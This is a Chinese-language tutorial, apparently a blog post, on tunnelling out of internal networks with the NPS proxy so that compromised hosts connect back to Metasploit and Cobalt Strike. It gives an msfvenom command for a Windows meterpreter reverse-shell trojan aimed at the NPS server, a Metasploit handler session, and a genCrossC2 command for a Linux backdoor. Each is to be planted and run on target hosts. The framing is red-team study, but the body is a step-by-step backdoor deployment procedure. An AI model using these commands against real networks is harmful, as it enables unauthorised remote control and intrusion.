目录
内网安全-隧道搭建&穿透上线
txt
内网穿透:解决网络控制上线&网络通讯问题
隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网)
代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)
内网穿透-nps-自定义-上线
NPS工具介绍
txt
一款轻量级、高性能、功能强大的内网代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用于访问内网网站、支付本地接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等......,并带有功能强大的web管理端。一个轻量级、高性能、强大的内网穿透代理服务器,带有强大的web管理端。
项目地址:https://github.com/ehang-io/nps
搭建过程
一、访问项目地址,将服务端和客户端所对应的包进行下载(windows或Linux版本)
以Linux版本为例
![](https://img-blog.csdnimg.cn/img_convert/31ecc07adba831951b1df79947905e9c.png)
下载完成后将服务端的包在服务器进行解压即可,解压完成后即可得到nps文件,如果没有可执行权限,赋予即可使用chmod命令。
![](https://img-blog.csdnimg.cn/img_convert/05a90b9549bae88c5d229b426a4ef9ac.png)
安装命令:
shell
./nps install
运行命令:
shell
./nps
//初始用户为admin,密码为123
//可通过配置文件自定义修改nps.conf
![](https://img-blog.csdnimg.cn/img_convert/f3263a756e4b80df0ef08b093d152093.png)
运行状态:
![](https://img-blog.csdnimg.cn/img_convert/a4261a6fc64216fabbd95dc66d688eaf.png)
访问服务器地址:8080即可,搭建完成。
![](https://img-blog.csdnimg.cn/img_convert/cd6f14d8d2591c74429ede1aae602f4b.png)
nps原理介绍
txt
运行NPS服务的云服务器和运行NPS客户端的主机之间会创建一条TCP或UDP隧道,可以映射云服务器上的某个端口到客户端主机的指定端口,其他主机访问云服务器的这个端口的流量都会通过创建的这条隧道转发到映射的主机端口,实现内网穿透效果。
![](https://img-blog.csdnimg.cn/img_convert/b8828c72fc5ca5c0b4f5dae7620de0aa.png)
MSF上线
一、服务端nps在客户端选项处,新增客户端
![](https://img-blog.csdnimg.cn/img_convert/7934bf3695bdef21bbc3efed23039a58.png)
二、将下载下的客户端解压完成后,执行客户端命令即可,然后在服务端可看到客户端的连接状态
![](https://img-blog.csdnimg.cn/img_convert/3c772d1505ca974b90acd117fba15792.png)
三、执行客户端命令,建立连接
![](https://img-blog.csdnimg.cn/img_convert/c83a1b13b9064baed31bd7a3ac5eedd0.png)
四、服务端更新,客户端显示在线
![](https://img-blog.csdnimg.cn/img_convert/a9e4cf10b0bdb85b9d53621db83380b6.png)
五、隧道建立
![](https://img-blog.csdnimg.cn/img_convert/c62a758e94679f8035a9fae81e198d9b.png)
![](https://img-blog.csdnimg.cn/img_convert/f5efdd13887169d5edcb5c00d57aa3d8.png)
六、生成木马
shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=nps服务器ip LPORT=服务端转发端口 -f exe -o nps.exe
![](https://img-blog.csdnimg.cn/img_convert/39cad941434ca1ac39f6cc00762a3b86.png)
七、kali 开启MSF开启监听
shell
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 8888
lport => 8888
msf6 exploit(multi/handler) > run
![](https://img-blog.csdnimg.cn/img_convert/856200c2388984dc6d2eb4ac0d1b94d2.png)
八、将木马放到目标内网主机当中,执行即可
![](https://img-blog.csdnimg.cn/img_convert/653c12612af97533637a36f0e8d3f84d.png)
九、成功上线MSF。观察发现本地8888端口。
txt
运行NPS服务的云服务器和运行NPS客户端的主机之间会创建一条TCP或UDP隧道,可以映射云服务器上的某个端口到客户端主机的指定端口,其他主机访问云服务器的这个端口的流量都会通过创建的这条隧道转发到映射的主机端口,实现内网穿透效果。
![](https://img-blog.csdnimg.cn/img_convert/a97b3f4b5000380a9e332c2699b0745b.png)
![](https://img-blog.csdnimg.cn/img_convert/b9848754636cf4a086571195f01e2076.png)
CS上线
nps配置步骤和MSF上线一致。
cs配置,创建两个监听器,生成木马即可。
一、nps服务器转发配置监听
![](https://img-blog.csdnimg.cn/img_convert/7014969b9f68ea677b625be22ab7ebd6.png)
二、内网上线主机配置监听
![](https://img-blog.csdnimg.cn/img_convert/f066f5fa03434915f1d93066ae9191f7.png)
![](https://img-blog.csdnimg.cn/img_convert/9658e0a1a54459f20cdb07687479f809.png)
三、生成木马即可
![](https://img-blog.csdnimg.cn/img_convert/a058b54dcfa4d51f3310d8973963c685.png)
四、将木马上传到目标内网机当中,执行,成功上线
![](https://img-blog.csdnimg.cn/img_convert/8d794e20be3318473640441b17eacdfa.png)
![](https://img-blog.csdnimg.cn/img_convert/d174333d81a84c472a8cf19eb84884b1.png)
![](https://img-blog.csdnimg.cn/img_convert/83ad82ca0377c66ab06348a167a5aba8.png)
![](https://img-blog.csdnimg.cn/img_convert/da1f243509fd2398e9b7be106b878c65.png)
内网渗透-Linux上线-cs上线Linux主机
1.下载插件
txt
crossC2主要面向企业自身及红队人员的安全评估框架,支持CobaltStrike对其他平台(Linux/MacOS/...)的安全评估,支持自定义模块,及包含一些常用的渗透模块。
插件地址:Release v3.3 - stable · gloxec/CrossC2 (github.com)
![](https://img-blog.csdnimg.cn/img_convert/3a029a4f19d9f57a2232a7fa6c901f09.png)
2.导入插件模块
将下载下来的.cna导入到脚本管理器当中即可,然后进行加载。
![](https://img-blog.csdnimg.cn/img_convert/3fccb5909019e28602d3d25eb80e5246.png)
成功加载后,建议重启CS服务。
3.配置监听器
由于插件只支持HTTPS与TCP,所以选择的监听为HTTPS。
![](https://img-blog.csdnimg.cn/img_convert/eb1e09c94511df2cd4edb0aebfa9042d.png)
4.服务端配置
txt
将下载下来的结尾是.Linux的文件导入到服务器中,注意需要导入到CS目录下,并赋予执行权限。
chmod u+x genCrossC2.Linux
![](https://img-blog.csdnimg.cn/img_convert/e228982c66411264ad3bf423bb4eda06.png)
5.配置C2监听器并生成木马
此处两种方法:(1)图形化界面选择完成后,复制生成的命令。(2)命令行直接生成。
txt
当在之前加载的插件后,就会出现这个CroseC2了,建议将.Linux文件上传到服务端并添加执行权限后,最好是重启以下CS客户端。
这里选择HTTPS的选项。
![](https://img-blog.csdnimg.cn/img_convert/b94d4d80c2b34b3fdf0849e45c2ad887.png)
生成Linux后门木马。
隐藏文件在服务端通过ls -la可查看
![](https://img-blog.csdnimg.cn/img_convert/97af1b87d7bf2cca2777940fae1ca0d4.png)
![](https://img-blog.csdnimg.cn/img_convert/69c2b2226f0d2f9dc3395d53798e6a19.png)
点击生成以后,在cs端日志处会出现以下的信息
![](https://img-blog.csdnimg.cn/img_convert/b064bccb29459023710ff9a1312ff6f9.png)
将此内容复制,然后在服务端执行即可。
txt
建议在cs目录下执行,去除前面的绝对路径。
![](https://img-blog.csdnimg.cn/img_convert/98afff6f84e3a35da327dae9b2f2e7c1.png)
注意:如果不能执行,出现问题,若日志显示出现MacOS系统内容,则是没有修改.cna文件的问题,修改.cna文件即可
txt
找到cna文件,就是之前加载的cna插件文件,修改里面的地址,地址是cs文件夹,下面的是系统文件,也就是刚刚下载的.Linux文件名字,其它的是不需要修改的。
修改后,要将CS客户端重启。
![](https://img-blog.csdnimg.cn/img_convert/87b55097cb53ff11404119c3e7bdf43e.png)
修改完成以后,再次重新生成木马即可。
或此处生成Linux木马,可直接执行命令即可生成。可不用上面的图形化界面操作。如果命令不理解可继续选择上述图形化操作,最后复制命令即可。
shell
./genCrossC2.Linux 服务器ip 监听端口 ./.cobaltstrike.beacon_keys null Linux x64 后门名称
6.执行木马
将生成的linux木马上传到目标服务器,执行即可
成功上线
![](https://img-blog.csdnimg.cn/img_convert/2629e595faeb0fb59edf7929861c754f.png)
文件浏览
![](https://img-blog.csdnimg.cn/img_convert/4d924d759a3e71c5d8396e37b059bd81.png)
文章不妥之处,欢迎批评指正!